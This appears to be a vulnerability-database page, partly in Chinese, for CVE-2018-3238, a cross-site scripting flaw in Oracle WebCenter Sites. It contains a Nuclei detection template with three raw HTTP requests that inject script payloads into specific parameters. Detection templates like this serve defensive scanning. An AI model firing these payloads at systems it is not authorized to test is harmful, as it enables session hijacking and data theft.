CVE-2018-3238: Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 | POC: 已公开

漏洞描述

The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites.

PoC代码[已公开]

id: CVE-2018-3238

info:
  name: Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting
  author: leovalcante
  severity: medium
  description: The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest patches and updates provided by Oracle to mitigate this vulnerability.
  reference:
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://www.oracle.com/security-alerts/cpuoct2018.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-3238
    - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
    cvss-score: 6.9
    cve-id: CVE-2018-3238
    epss-score: 0.30481
    epss-percentile: 0.96563
    cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: oracle
    product: webcenter_sites
  tags: cve2018,cve,oracle,wcs,xss

http:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'

      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'Variables.cs_imagedir'
        condition: and
# digest: 4a0a0047304502204e2d509687d22eef3ef07ed493a1d6bf81256cd58f06bee86570b93a96b148d6022100fd0bca1656dd26a66f824f76b1b661dfd72dc99b8f3f3294100bb1526e09fe3c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐